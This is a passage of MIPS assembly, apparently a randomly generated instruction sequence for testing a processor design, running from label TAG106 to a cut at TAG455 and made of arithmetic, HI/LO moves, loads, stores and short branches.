TAG106: ori $2, $2, 13 bgez $2, TAG107 divu $2, $2 or $1, $2, $2 TAG107: mfhi $4 bne $1, $1, TAG108 mtlo $1 sll $1, $1, 9 TAG108: div $1, $1 addiu $3, $1, 0 multu $3, $3 bne $3, $1, TAG109 TAG109: sll $0, $0, 0 sll $0, $0, 0 multu $3, $3 lui $2, 15 TAG110: mthi $2 sll $0, $0, 0 sll $0, $0, 0 sltiu $2, $2, 5 TAG111: beq $2, $2, TAG112 mflo $2 divu $2, $2 bne $2, $2, TAG112 TAG112: sll $0, $0, 0 xori $2, $2, 13 mthi $2 multu $4, $4 TAG113: lui $1, 6 sll $0, $0, 0 mthi $1 sllv $1, $1, $1 TAG114: lui $3, 9 mtlo $1 sll $0, $0, 0 bgtz $4, TAG115 TAG115: lui $2, 11 lhu $2, 0($4) divu $2, $2 mthi $4 TAG116: sw $2, -256($2) addu $1, $2, $2 xori $3, $2, 4 beq $2, $3, TAG117 TAG117: sltiu $4, $3, 11 slti $3, $4, 7 sb $3, 0($3) lb $1, 0($3) TAG118: sltiu $3, $1, 14 mthi $3 lbu $3, 0($1) bne $1, $3, TAG119 TAG119: mthi $3 lui $3, 15 subu $2, $3, $3 sltiu $4, $3, 9 TAG120: bgez $4, TAG121 lhu $2, 0($4) sb $2, 0($4) mthi $4 TAG121: andi $4, $2, 12 mfhi $2 sltu $4, $4, $2 mfhi $1 TAG122: sb $1, 0($1) mtlo $1 sb $1, 0($1) slti $2, $1, 7 TAG123: bne $2, $2, TAG124 mflo $4 lb $4, 0($2) sb $4, 0($4) TAG124: lui $4, 13 sll $0, $0, 0 sll $2, $4, 7 multu $4, $4 TAG125: sll $0, $0, 0 divu $2, $2 mfhi $1 sra $2, $1, 9 TAG126: sh $2, 0($2) lui $1, 8 srl $1, $1, 12 bgez $2, TAG127 TAG127: mtlo $1 mflo $1 sb $1, 0($1) bltz $1, TAG128 TAG128: mtlo $1 lw $1, 0($1) mtlo $1 addu $2, $1, $1 TAG129: bltz $2, TAG130 mult $2, $2 bgtz $2, TAG130 sb $2, -256($2) TAG130: lui $1, 13 mflo $1 lui $3, 6 sll $0, $0, 0 TAG131: lui $1, 9 bne $1, $1, TAG132 sll $0, $0, 0 lui $3, 5 TAG132: slt $3, $3, $3 mflo $2 bne $3, $2, TAG133 sw $2, 0($3) TAG133: mtlo $2 mflo $4 mflo $4 sll $0, $0, 0 TAG134: sll $0, $0, 0 beq $4, $4, TAG135 mthi $4 mthi $4 TAG135: mfhi $1 bne $4, $1, TAG136 mthi $1 mtlo $1 TAG136: beq $1, $1, TAG137 sll $0, $0, 0 mtlo $2 divu $1, $1 TAG137: sll $0, $0, 0 mthi $2 beq $2, $2, TAG138 sll $0, $0, 0 TAG138: sll $0, $0, 0 bgez $1, TAG139 lui $1, 11 addiu $4, $1, 14 TAG139: sll $0, $0, 0 andi $2, $1, 12 and $2, $2, $4 multu $2, $2 TAG140: mthi $2 sb $2, 0($2) mtlo $2 multu $2, $2 TAG141: bne $2, $2, TAG142 lhu $3, 0($2) lui $2, 1 blez $3, TAG142 TAG142: sltiu $2, $2, 11 subu $2, $2, $2 bgez $2, TAG143 add $2, $2, $2 TAG143: bne $2, $2, TAG144 lw $4, 0($2) blez $2, TAG144 mflo $3 TAG144: bne $3, $3, TAG145 sw $3, 0($3) mfhi $4 lui $1, 0 TAG145: mthi $1 bne $1, $1, TAG146 lui $1, 0 multu $1, $1 TAG146: mflo $3 blez $3, TAG147 sb $1, 0($3) mfhi $4 TAG147: blez $4, TAG148 mult $4, $4 mult $4, $4 mflo $1 TAG148: beq $1, $1, TAG149 mthi $1 beq $1, $1, TAG149 lui $1, 14 TAG149: sra $2, $1, 1 bgez $2, TAG150 mtlo $2 beq $2, $2, TAG150 TAG150: mult $2, $2 mflo $3 mfhi $4 lui $2, 1 TAG151: beq $2, $2, TAG152 sll $0, $0, 0 subu $4, $2, $2 sub $4, $4, $4 TAG152: mfhi $2 blez $2, TAG153 lui $3, 11 mfhi $3 TAG153: multu $3, $3 lui $1, 5 mfhi $3 bgtz $3, TAG154 TAG154: lb $4, 0($3) beq $3, $3, TAG155 lw $2, 0($4) bgez $4, TAG155 TAG155: sw $2, 0($2) multu $2, $2 andi $3, $2, 13 bgtz $2, TAG156 TAG156: xor $1, $3, $3 mflo $3 bltz $3, TAG157 mthi $1 TAG157: sb $3, 0($3) sltiu $1, $3, 14 mflo $1 bgtz $1, TAG158 TAG158: multu $1, $1 beq $1, $1, TAG159 srlv $3, $1, $1 lw $2, 0($3) TAG159: mthi $2 mtlo $2 sll $1, $2, 13 mflo $3 TAG160: bne $3, $3, TAG161 lui $1, 11 mthi $3 lui $2, 8 TAG161: or $2, $2, $2 beq $2, $2, TAG162 divu $2, $2 beq $2, $2, TAG162 TAG162: nor $4, $2, $2 mtlo $2 mthi $4 mult $2, $2 TAG163: beq $4, $4, TAG164 sltu $3, $4, $4 sw $3, 0($4) div $4, $3 TAG164: mult $3, $3 bltz $3, TAG165 mthi $3 lui $3, 10 TAG165: mtlo $3 sll $0, $0, 0 bgez $3, TAG166 sll $0, $0, 0 TAG166: beq $3, $3, TAG167 sll $0, $0, 0 lui $1, 12 sra $2, $3, 11 TAG167: mtlo $2 multu $2, $2 sll $0, $0, 0 blez $2, TAG168 TAG168: multu $1, $1 bne $1, $1, TAG169 or $1, $1, $1 multu $1, $1 TAG169: sll $0, $0, 0 mult $1, $1 sltu $1, $3, $1 sll $4, $1, 15 TAG170: mfhi $4 sltiu $4, $4, 6 xor $4, $4, $4 or $4, $4, $4 TAG171: slti $4, $4, 0 bgez $4, TAG172 multu $4, $4 bne $4, $4, TAG172 TAG172: mthi $4 mflo $3 lui $1, 12 mult $4, $3 TAG173: bgez $1, TAG174 lui $3, 12 bgez $1, TAG174 div $3, $3 TAG174: subu $4, $3, $3 bne $4, $4, TAG175 mtlo $3 lui $4, 6 TAG175: blez $4, TAG176 lui $2, 12 lui $2, 0 sw $4, 0($2) TAG176: mtlo $2 sw $2, 0($2) lbu $1, 0($2) mtlo $2 TAG177: mtlo $1 mult $1, $1 lui $2, 15 sub $4, $1, $1 TAG178: beq $4, $4, TAG179 lui $2, 7 lhu $4, 0($4) sw $4, 0($4) TAG179: subu $2, $4, $4 mflo $1 bltz $4, TAG180 lh $3, 0($2) TAG180: multu $3, $3 mflo $2 sra $2, $2, 1 lw $3, 0($3) TAG181: sll $4, $3, 3 srl $1, $4, 12 sltu $4, $1, $4 sh $4, 0($1) TAG182: mflo $1 lw $2, 0($1) mfhi $3 mflo $2 TAG183: multu $2, $2 multu $2, $2 bne $2, $2, TAG184 andi $4, $2, 7 TAG184: sltiu $2, $4, 8 mflo $4 multu $2, $2 mult $2, $4 TAG185: addiu $2, $4, 2 lhu $1, 0($4) addiu $2, $2, 11 bgtz $2, TAG186 TAG186: mthi $2 sra $4, $2, 5 and $4, $2, $2 bne $2, $4, TAG187 TAG187: sll $4, $4, 0 lui $1, 1 andi $2, $1, 6 sll $0, $0, 0 TAG188: bne $3, $3, TAG189 mflo $4 mflo $4 mtlo $3 TAG189: sra $2, $4, 9 multu $2, $2 sll $1, $2, 1 mflo $4 TAG190: addu $3, $4, $4 sh $3, 0($4) or $2, $3, $3 lui $1, 4 TAG191: or $3, $1, $1 bne $1, $1, TAG192 mflo $4 lui $3, 14 TAG192: sll $0, $0, 0 srlv $3, $3, $3 slti $2, $3, 5 and $4, $3, $4 TAG193: bne $4, $4, TAG194 mult $4, $4 srav $1, $4, $4 mflo $1 TAG194: mthi $1 sb $1, 0($1) bltz $1, TAG195 sh $1, 0($1) TAG195: sb $1, 0($1) bgez $1, TAG196 andi $2, $1, 11 nor $2, $2, $2 TAG196: bgez $2, TAG197 mfhi $1 beq $1, $1, TAG197 sb $2, 0($2) TAG197: subu $3, $1, $1 lb $3, 0($3) mflo $1 addu $1, $3, $3 TAG198: bne $1, $1, TAG199 mfhi $1 srlv $3, $1, $1 bne $1, $1, TAG199 TAG199: mult $3, $3 ori $3, $3, 2 bgtz $3, TAG200 lui $3, 7 TAG200: bne $3, $3, TAG201 mflo $4 mtlo $3 bne $3, $3, TAG201 TAG201: andi $3, $4, 8 mult $4, $4 multu $4, $4 sltiu $4, $3, 9 TAG202: lbu $1, 0($4) lui $3, 11 mthi $1 lbu $1, 0($4) TAG203: lui $3, 7 sll $0, $0, 0 mult $1, $1 beq $1, $3, TAG204 TAG204: mult $3, $3 bgez $3, TAG205 lui $3, 11 beq $3, $3, TAG205 TAG205: lui $1, 14 multu $1, $1 sll $0, $0, 0 mthi $3 TAG206: bgez $4, TAG207 mflo $3 bne $4, $4, TAG207 and $3, $3, $4 TAG207: lw $3, 0($3) mthi $3 mflo $2 ori $1, $3, 15 TAG208: lb $2, 0($1) sll $2, $2, 14 multu $2, $2 mtlo $2 TAG209: mflo $2 beq $2, $2, TAG210 lui $3, 10 add $3, $3, $3 TAG210: lui $2, 11 xor $1, $3, $2 bgtz $3, TAG211 multu $3, $1 TAG211: sll $0, $0, 0 sra $4, $1, 11 lui $3, 3 slti $3, $1, 8 TAG212: bgtz $3, TAG213 lb $1, 0($3) multu $3, $1 bltz $3, TAG213 TAG213: lb $3, 0($1) bgtz $1, TAG214 andi $3, $3, 4 multu $3, $1 TAG214: mfhi $3 lbu $3, 0($3) mfhi $3 sw $3, 0($3) TAG215: lui $2, 14 bgez $3, TAG216 sll $0, $0, 0 lui $1, 10 TAG216: bgez $1, TAG217 sltiu $2, $1, 12 divu $2, $1 mult $1, $1 TAG217: beq $2, $2, TAG218 sllv $2, $2, $2 mflo $1 mult $1, $2 TAG218: mfhi $3 sh $1, 0($1) srav $2, $1, $3 bgtz $2, TAG219 TAG219: mflo $2 sh $2, 0($2) srlv $4, $2, $2 mflo $3 TAG220: lui $3, 7 sllv $4, $3, $3 or $4, $3, $3 mflo $2 TAG221: mfhi $3 lw $1, 0($2) sh $2, 0($3) lb $2, 0($1) TAG222: lb $1, 0($2) addiu $2, $2, 9 srav $3, $2, $1 div $2, $3 TAG223: mfhi $2 mflo $2 bltz $2, TAG224 lui $2, 12 TAG224: sll $0, $0, 0 mfhi $2 multu $2, $2 mthi $2 TAG225: bgez $2, TAG226 lui $1, 3 multu $2, $1 beq $1, $2, TAG226 TAG226: sll $0, $0, 0 sll $0, $0, 0 lbu $2, 0($3) bne $3, $3, TAG227 TAG227: mfhi $1 xori $1, $2, 14 andi $1, $2, 15 and $3, $1, $1 TAG228: mfhi $1 lui $1, 7 mfhi $3 lhu $2, 0($3) TAG229: sh $2, 0($2) mthi $2 subu $3, $2, $2 lui $2, 10 TAG230: bgez $2, TAG231 sll $0, $0, 0 mtlo $2 bne $2, $2, TAG231 TAG231: mflo $4 mtlo $4 mtlo $2 mult $2, $4 TAG232: mthi $4 mult $4, $4 mthi $4 lui $3, 10 TAG233: sltiu $2, $3, 11 beq $2, $3, TAG234 lui $3, 5 sw $3, 0($2) TAG234: mfhi $2 lb $2, 0($2) lui $4, 13 lui $1, 4 TAG235: beq $1, $1, TAG236 sll $0, $0, 0 bgtz $1, TAG236 mtlo $4 TAG236: sll $0, $0, 0 bne $4, $4, TAG237 multu $4, $4 mthi $4 TAG237: lui $3, 7 srlv $2, $4, $4 sll $0, $0, 0 mflo $4 TAG238: mtlo $4 mthi $4 lui $4, 12 div $4, $4 TAG239: mthi $4 sll $0, $0, 0 mfhi $3 divu $4, $3 TAG240: or $1, $3, $3 slti $3, $3, 6 bgez $1, TAG241 mfhi $1 TAG241: bltz $1, TAG242 sub $4, $1, $1 lui $3, 2 bltz $4, TAG242 TAG242: subu $1, $3, $3 lui $3, 9 addiu $2, $3, 7 sb $1, 0($1) TAG243: divu $2, $2 mtlo $2 mtlo $2 srlv $2, $2, $2 TAG244: lui $1, 8 addiu $4, $1, 8 slt $4, $2, $2 mfhi $1 TAG245: bne $1, $1, TAG246 slti $4, $1, 10 sllv $4, $4, $1 sll $4, $4, 11 TAG246: sh $4, -2048($4) lui $1, 2 and $2, $1, $4 sltiu $2, $1, 15 TAG247: bltz $2, TAG248 lh $3, 0($2) addiu $4, $3, 11 subu $4, $2, $2 TAG248: addu $2, $4, $4 mthi $2 sb $2, 0($4) lb $1, 0($2) TAG249: lui $1, 11 multu $1, $1 bgez $1, TAG250 lui $1, 6 TAG250: or $3, $1, $1 bgtz $1, TAG251 sll $0, $0, 0 bgtz $3, TAG251 TAG251: multu $4, $4 sh $4, 0($4) bgez $4, TAG252 mfhi $4 TAG252: lhu $4, 0($4) bne $4, $4, TAG253 mflo $2 mult $4, $2 TAG253: mflo $4 lhu $4, 0($2) mthi $4 blez $2, TAG254 TAG254: slti $4, $4, 6 lbu $3, 0($4) mthi $4 slti $3, $4, 7 TAG255: bltz $3, TAG256 div $3, $3 sra $1, $3, 11 lui $3, 14 TAG256: sll $0, $0, 0 sll $0, $0, 0 mflo $2 mtlo $2 TAG257: sb $2, 0($2) sb $2, 0($2) bgez $2, TAG258 andi $4, $2, 0 TAG258: mthi $4 blez $4, TAG259 sw $4, 0($4) sh $4, 0($4) TAG259: multu $4, $4 lui $3, 6 bgtz $4, TAG260 lhu $4, 0($4) TAG260: subu $3, $4, $4 lui $2, 12 lbu $2, 0($3) lui $1, 8 TAG261: sllv $4, $1, $1 mflo $3 sll $0, $0, 0 mtlo $3 TAG262: mthi $3 multu $3, $3 or $1, $3, $3 mfhi $1 TAG263: bne $1, $1, TAG264 sh $1, 0($1) lb $1, 0($1) sh $1, 0($1) TAG264: sb $1, 0($1) lw $3, 0($1) srl $4, $3, 10 mflo $4 TAG265: lh $4, 0($4) lui $4, 11 addiu $1, $4, 2 sll $0, $0, 0 TAG266: mtlo $4 sll $0, $0, 0 slti $3, $4, 2 ori $2, $3, 10 TAG267: addiu $2, $2, 9 bltz $2, TAG268 lui $2, 10 mtlo $2 TAG268: mthi $2 sll $0, $0, 0 mfhi $1 divu $1, $1 TAG269: and $3, $1, $1 sll $0, $0, 0 lui $3, 15 bne $3, $1, TAG270 TAG270: sll $0, $0, 0 mthi $3 srl $2, $3, 3 mthi $3 TAG271: mult $2, $2 addu $2, $2, $2 sll $0, $0, 0 sll $0, $0, 0 TAG272: sll $0, $0, 0 sltiu $4, $3, 14 bne $3, $4, TAG273 mflo $4 TAG273: bne $4, $4, TAG274 sll $2, $4, 3 bgtz $4, TAG274 div $4, $2 TAG274: div $2, $2 sll $0, $0, 0 sll $2, $2, 7 mult $2, $2 TAG275: mfhi $4 bne $2, $4, TAG276 mthi $2 sb $4, 0($2) TAG276: bgtz $4, TAG277 mtlo $4 mflo $4 lb $1, 0($4) TAG277: blez $1, TAG278 xori $1, $1, 5 lh $4, 0($1) mult $1, $4 TAG278: sltu $1, $4, $4 mult $1, $1 bne $4, $4, TAG279 mflo $2 TAG279: blez $2, TAG280 srl $3, $2, 7 lbu $2, 0($2) mult $3, $2 TAG280: srl $1, $2, 14 bne $1, $1, TAG281 mult $2, $1 mult $1, $2 TAG281: or $4, $1, $1 lui $2, 8 mthi $1 sb $1, 0($1) TAG282: mfhi $3 beq $2, $2, TAG283 lui $4, 12 mfhi $2 TAG283: sll $0, $0, 0 mtlo $2 lui $3, 12 mtlo $3 TAG284: divu $3, $3 multu $3, $3 subu $2, $3, $3 mtlo $2 TAG285: lui $1, 7 sll $0, $0, 0 sh $3, 0($2) sh $2, 0($2) TAG286: sll $1, $3, 5 mthi $1 mflo $3 mfhi $3 TAG287: mult $3, $3 mthi $3 subu $1, $3, $3 mthi $3 TAG288: lbu $3, 0($1) multu $3, $1 mthi $3 lui $3, 4 TAG289: mfhi $1 addu $1, $3, $3 blez $1, TAG290 lui $4, 10 TAG290: bne $4, $4, TAG291 sll $0, $0, 0 sll $0, $0, 0 sltiu $3, $4, 3 TAG291: mthi $3 slti $2, $3, 6 mult $3, $3 mfhi $4 TAG292: bgtz $4, TAG293 lh $1, 0($4) lw $1, 0($1) bltz $1, TAG293 TAG293: lui $4, 0 mtlo $4 lb $1, 0($1) mtlo $1 TAG294: sub $4, $1, $1 slt $2, $1, $1 addu $4, $4, $4 lh $2, 0($4) TAG295: mflo $2 bgtz $2, TAG296 mthi $2 sll $2, $2, 1 TAG296: mult $2, $2 sllv $4, $2, $2 beq $2, $2, TAG297 mthi $4 TAG297: mthi $4 multu $4, $4 mtlo $4 bne $4, $4, TAG298 TAG298: mult $4, $4 mult $4, $4 multu $4, $4 or $1, $4, $4 TAG299: andi $4, $1, 8 bltz $4, TAG300 lui $2, 6 lui $1, 13 TAG300: sll $0, $0, 0 mflo $2 mflo $1 lui $2, 15 TAG301: lui $3, 7 ori $3, $2, 0 srlv $3, $3, $3 sll $0, $0, 0 TAG302: mfhi $1 multu $1, $1 mtlo $3 mthi $3 TAG303: beq $1, $1, TAG304 mult $1, $1 sltiu $4, $1, 12 mfhi $4 TAG304: mthi $4 mult $4, $4 slti $3, $4, 7 blez $4, TAG305 TAG305: mthi $3 sb $3, 0($3) multu $3, $3 mtlo $3 TAG306: bne $3, $3, TAG307 lui $3, 13 sll $0, $0, 0 sll $0, $0, 0 TAG307: mtlo $3 lui $1, 4 mtlo $3 ori $4, $1, 0 TAG308: sll $0, $0, 0 and $3, $4, $4 subu $1, $4, $4 sll $0, $0, 0 TAG309: lhu $3, 0($1) bltz $3, TAG310 lui $2, 6 mflo $2 TAG310: beq $2, $2, TAG311 sra $3, $2, 12 bne $2, $3, TAG311 sw $3, 0($2) TAG311: multu $3, $3 divu $3, $3 bgtz $3, TAG312 mtlo $3 TAG312: blez $3, TAG313 slti $1, $3, 7 sw $3, -208($3) lbu $3, -208($3) TAG313: mthi $3 srl $4, $3, 8 sltiu $3, $4, 5 mfhi $1 TAG314: bne $1, $1, TAG315 sra $2, $1, 11 mtlo $1 mflo $2 TAG315: mthi $2 lui $2, 4 sll $0, $0, 0 div $2, $1 TAG316: bgtz $1, TAG317 sw $1, -208($1) mthi $1 bne $1, $1, TAG317 TAG317: sh $1, -208($1) mult $1, $1 and $4, $1, $1 srav $1, $1, $4 TAG318: srav $3, $1, $1 lui $4, 8 mfhi $4 slti $2, $1, 14 TAG319: mflo $4 lui $4, 14 sb $4, 0($2) mflo $2 TAG320: lui $1, 7 divu $2, $1 sll $0, $0, 0 sll $0, $0, 0 TAG321: lui $2, 13 bltz $2, TAG322 lui $3, 1 bne $2, $2, TAG322 TAG322: sll $0, $0, 0 mflo $4 lb $3, 0($4) lb $1, 48($3) TAG323: subu $1, $1, $1 multu $1, $1 lhu $4, 0($1) or $1, $1, $1 TAG324: bgtz $1, TAG325 lui $1, 12 andi $2, $1, 8 mtlo $1 TAG325: lb $2, 0($2) and $1, $2, $2 mtlo $2 mtlo $1 TAG326: bltz $1, TAG327 sltiu $2, $1, 13 mthi $2 beq $1, $2, TAG327 TAG327: mtlo $2 multu $2, $2 bltz $2, TAG328 sb $2, 0($2) TAG328: mthi $2 bne $2, $2, TAG329 mtlo $2 multu $2, $2 TAG329: sw $2, 0($2) slti $3, $2, 3 addi $2, $2, 10 lb $1, 0($3) TAG330: mfhi $2 mtlo $2 sb $2, 0($2) sh $2, 0($2) TAG331: mfhi $1 multu $2, $1 bne $2, $2, TAG332 lui $4, 9 TAG332: lui $3, 9 sll $0, $0, 0 slti $3, $1, 1 mthi $3 TAG333: sb $3, 0($3) xori $2, $3, 6 mfhi $2 sb $2, 0($2) TAG334: lbu $1, 0($2) mult $1, $2 lbu $4, 0($1) sb $4, 0($1) TAG335: mflo $1 lui $1, 13 sll $0, $0, 0 bltz $1, TAG336 TAG336: sll $0, $0, 0 bgtz $1, TAG337 div $1, $4 lui $2, 10 TAG337: xori $3, $2, 11 bltz $2, TAG338 mthi $3 sb $2, 0($2) TAG338: bgez $3, TAG339 mfhi $1 sh $3, 0($3) beq $1, $3, TAG339 TAG339: mtlo $1 mflo $3 blez $3, TAG340 lh $3, 0($3) TAG340: beq $3, $3, TAG341 sw $3, 0($3) blez $3, TAG341 slti $3, $3, 7 TAG341: lhu $4, 0($3) lui $2, 8 mfhi $1 multu $4, $4 TAG342: sh $1, 0($1) mflo $1 sra $3, $1, 3 mult $3, $1 TAG343: mflo $4 add $4, $3, $3 slt $3, $4, $4 or $4, $4, $3 TAG344: mult $4, $4 srlv $4, $4, $4 mult $4, $4 srl $2, $4, 4 TAG345: sh $2, 0($2) mtlo $2 mthi $2 mthi $2 TAG346: sb $2, 0($2) mult $2, $2 blez $2, TAG347 mfhi $4 TAG347: mtlo $4 bgtz $4, TAG348 xor $3, $4, $4 sb $4, 0($4) TAG348: mult $3, $3 mflo $2 blez $2, TAG349 lb $2, 0($2) TAG349: multu $2, $2 mflo $1 lui $3, 5 lui $2, 5 TAG350: lui $2, 2 slti $1, $2, 10 sll $0, $0, 0 lhu $4, 0($1) TAG351: lui $3, 3 bgtz $4, TAG352 addu $3, $3, $4 sll $1, $3, 3 TAG352: srav $2, $1, $1 sll $0, $0, 0 mflo $2 sll $0, $0, 0 TAG353: multu $2, $2 lw $3, 0($2) bgtz $3, TAG354 lui $1, 13 TAG354: bne $1, $1, TAG355 lui $3, 10 sll $0, $0, 0 nor $4, $1, $3 TAG355: mtlo $4 divu $4, $4 mthi $4 multu $4, $4 TAG356: beq $4, $4, TAG357 xori $2, $4, 7 lh $1, 0($2) bgez $4, TAG357 TAG357: andi $2, $1, 6 sw $2, 0($2) andi $3, $2, 14 subu $4, $1, $1 TAG358: multu $4, $4 multu $4, $4 addi $3, $4, 14 mflo $1 TAG359: lui $3, 12 sb $3, 0($1) sll $0, $0, 0 andi $3, $2, 4 TAG360: blez $3, TAG361 lui $4, 4 bltz $4, TAG361 sub $3, $4, $3 TAG361: bltz $3, TAG362 mult $3, $3 addiu $4, $3, 11 and $4, $3, $3 TAG362: mfhi $1 lui $4, 8 sh $4, 0($1) mfhi $1 TAG363: mfhi $2 lbu $2, 0($2) lui $2, 11 subu $3, $2, $2 TAG364: multu $3, $3 mthi $3 lui $3, 8 beq $3, $3, TAG365 TAG365: lui $2, 8 beq $2, $2, TAG366 lui $4, 7 lhu $3, 0($3) TAG366: bgez $3, TAG367 sll $0, $0, 0 bltz $3, TAG367 div $3, $3 TAG367: sll $0, $0, 0 mult $3, $3 mtlo $3 mthi $2 TAG368: divu $2, $2 mfhi $2 lui $4, 8 multu $4, $2 TAG369: sll $0, $0, 0 sra $1, $4, 10 sll $0, $0, 0 multu $3, $4 TAG370: sll $0, $0, 0 mflo $4 beq $4, $4, TAG371 mtlo $3 TAG371: mfhi $3 add $3, $4, $3 mult $4, $3 bltz $4, TAG372 TAG372: sra $4, $3, 8 sb $3, 0($4) lhu $3, 0($3) div $4, $3 TAG373: lui $2, 5 nor $1, $3, $2 sll $0, $0, 0 lui $1, 0 TAG374: bne $1, $1, TAG375 mthi $1 and $2, $1, $1 lh $1, 0($1) TAG375: or $2, $1, $1 mfhi $3 lbu $4, 0($1) lui $3, 15 TAG376: mfhi $1 lh $2, 0($1) bltz $3, TAG377 sw $2, 0($1) TAG377: mtlo $2 bltz $2, TAG378 mthi $2 lw $1, 0($2) TAG378: bne $1, $1, TAG379 sll $3, $1, 4 mthi $3 mfhi $2 TAG379: bgtz $2, TAG380 addiu $4, $2, 7 lw $4, 0($2) mfhi $4 TAG380: beq $4, $4, TAG381 mult $4, $4 lui $2, 9 bgez $2, TAG381 TAG381: multu $2, $2 bgez $2, TAG382 addiu $4, $2, 6 bgez $4, TAG382 TAG382: addiu $2, $4, 14 lui $2, 5 multu $4, $2 divu $4, $4 TAG383: lui $4, 7 beq $2, $2, TAG384 sll $0, $0, 0 beq $4, $4, TAG384 TAG384: sll $0, $0, 0 sll $0, $0, 0 srlv $2, $4, $4 lui $1, 0 TAG385: sub $3, $1, $1 addi $1, $1, 12 sh $1, 0($1) or $4, $1, $3 TAG386: div $4, $4 sb $4, 0($4) andi $1, $4, 7 mflo $2 TAG387: lui $4, 12 lui $2, 13 sll $0, $0, 0 sll $0, $0, 0 TAG388: sub $1, $3, $3 nor $2, $3, $3 and $4, $3, $1 lhu $3, 1($2) TAG389: bne $3, $3, TAG390 lui $3, 13 sll $0, $0, 0 sllv $3, $3, $3 TAG390: mflo $1 sll $3, $1, 10 sltiu $4, $3, 5 addiu $4, $3, 3 TAG391: lui $4, 10 nor $3, $4, $4 mflo $4 or $1, $3, $4 TAG392: mult $1, $1 bne $1, $1, TAG393 div $1, $1 mtlo $1 TAG393: sll $4, $1, 12 xori $2, $1, 11 sra $1, $4, 12 addu $3, $1, $4 TAG394: divu $3, $3 div $3, $3 bne $3, $3, TAG395 divu $3, $3 TAG395: beq $3, $3, TAG396 mtlo $3 sll $2, $3, 0 blez $3, TAG396 TAG396: divu $2, $2 mtlo $2 andi $1, $2, 8 bne $1, $1, TAG397 TAG397: nor $2, $1, $1 addu $3, $2, $2 blez $2, TAG398 lui $4, 2 TAG398: sll $0, $0, 0 mtlo $4 bne $4, $4, TAG399 sllv $3, $4, $4 TAG399: lui $1, 5 addu $2, $3, $1 bgez $3, TAG400 sll $2, $1, 7 TAG400: lui $1, 13 sllv $1, $2, $2 mthi $1 or $4, $1, $2 TAG401: bgez $4, TAG402 sll $0, $0, 0 bne $4, $4, TAG402 mfhi $4 TAG402: sll $0, $0, 0 beq $3, $4, TAG403 lui $4, 11 div $3, $4 TAG403: mtlo $4 multu $4, $4 bltz $4, TAG404 lui $1, 3 TAG404: mult $1, $1 blez $1, TAG405 sll $0, $0, 0 bltz $1, TAG405 TAG405: sll $0, $0, 0 bgez $1, TAG406 lui $1, 7 andi $4, $1, 4 TAG406: sll $0, $0, 0 mtlo $4 sll $0, $0, 0 sll $0, $0, 0 TAG407: subu $1, $4, $4 addi $1, $1, 15 sll $0, $0, 0 mtlo $1 TAG408: mflo $2 sb $1, 0($2) bgtz $2, TAG409 sb $1, 0($2) TAG409: sb $2, 0($2) lui $3, 15 bne $2, $3, TAG410 or $4, $2, $2 TAG410: mflo $4 sltu $1, $4, $4 mtlo $4 bne $4, $4, TAG411 TAG411: lui $4, 13 bne $1, $4, TAG412 sltiu $3, $4, 2 div $3, $4 TAG412: lb $2, 0($3) beq $2, $3, TAG413 andi $4, $3, 3 bgtz $3, TAG413 TAG413: lui $3, 9 and $3, $3, $3 xori $3, $3, 5 bgtz $3, TAG414 TAG414: srl $4, $3, 0 bne $4, $4, TAG415 mflo $4 mthi $3 TAG415: lui $2, 13 mflo $2 mult $2, $4 mflo $4 TAG416: srav $4, $4, $4 lui $3, 1 bgez $4, TAG417 addu $2, $4, $3 TAG417: addiu $1, $2, 6 lui $1, 2 mtlo $1 sll $0, $0, 0 TAG418: sll $0, $0, 0 addiu $3, $3, 6 lui $1, 13 sll $0, $0, 0 TAG419: blez $2, TAG420 mtlo $2 bgtz $2, TAG420 mflo $2 TAG420: mfhi $1 lui $1, 9 mtlo $2 sll $0, $0, 0 TAG421: divu $2, $2 mthi $2 bne $2, $2, TAG422 sll $0, $0, 0 TAG422: sll $0, $0, 0 sll $0, $0, 0 sll $0, $0, 0 bne $3, $2, TAG423 TAG423: multu $4, $4 lh $4, 0($4) mfhi $2 bgtz $4, TAG424 TAG424: addiu $4, $2, 15 lb $4, 0($4) slt $1, $4, $2 beq $2, $4, TAG425 TAG425: sb $1, 0($1) mflo $1 ori $1, $1, 5 mfhi $2 TAG426: lui $4, 6 mult $2, $2 mult $4, $2 lui $3, 5 TAG427: lui $1, 5 mflo $4 mthi $4 lui $2, 8 TAG428: lui $2, 9 mflo $4 mult $4, $2 sw $2, 0($4) TAG429: lw $3, 0($4) subu $3, $4, $3 sll $0, $0, 0 lhu $3, 0($4) TAG430: sh $3, 0($3) addi $1, $3, 3 lui $4, 0 sh $4, 0($3) TAG431: beq $4, $4, TAG432 mtlo $4 sll $1, $4, 11 lh $4, 0($1) TAG432: beq $4, $4, TAG433 lui $4, 8 lb $3, 0($4) lui $1, 13 TAG433: mthi $1 lui $3, 11 div $3, $3 srlv $2, $1, $1 TAG434: lb $4, 0($2) srav $4, $4, $4 beq $4, $2, TAG435 nor $3, $4, $4 TAG435: div $3, $3 lh $4, 1($3) multu $4, $3 slti $1, $4, 2 TAG436: multu $1, $1 sllv $3, $1, $1 addu $3, $1, $3 lui $2, 14 TAG437: sll $0, $0, 0 lui $2, 5 sll $0, $0, 0 sb $2, 0($4) TAG438: mtlo $2 sltiu $4, $2, 6 addu $4, $2, $4 divu $2, $2 TAG439: bne $4, $4, TAG440 sll $0, $0, 0 mfhi $2 multu $4, $2 TAG440: sw $2, 0($2) lui $2, 2 divu $2, $2 sll $0, $0, 0 TAG441: mtlo $4 bltz $4, TAG442 sll $0, $0, 0 sll $0, $0, 0 TAG442: sll $0, $0, 0 mtlo $4 sll $0, $0, 0 andi $1, $4, 8 TAG443: lb $1, 0($1) mult $1, $1 lw $3, 0($1) multu $1, $1 TAG444: blez $3, TAG445 mtlo $3 xor $2, $3, $3 mtlo $2 TAG445: xori $1, $2, 1 mfhi $1 mtlo $2 ori $4, $1, 11 TAG446: sb $4, 0($4) sb $4, 0($4) multu $4, $4 lbu $3, 0($4) TAG447: lui $4, 2 lui $2, 10 bne $4, $2, TAG448 lb $2, 0($3) TAG448: sra $4, $2, 8 lb $4, 0($4) lui $1, 1 bne $4, $2, TAG449 TAG449: ori $2, $1, 2 mtlo $2 sll $0, $0, 0 mfhi $1 TAG450: mult $1, $1 sw $1, 0($1) bne $1, $1, TAG451 mthi $1 TAG451: bgtz $1, TAG452 sub $1, $1, $1 lui $1, 2 addu $2, $1, $1 TAG452: mthi $2 sll $0, $0, 0 lui $4, 12 srl $4, $4, 7 TAG453: mflo $3 lui $2, 9 lui $4, 1 lbu $4, 0($3) TAG454: nor $4, $4, $4 or $2, $4, $4 sb $4, 1($4) beq $4, $2, TAG455 TAG455: addiu $1, $2, 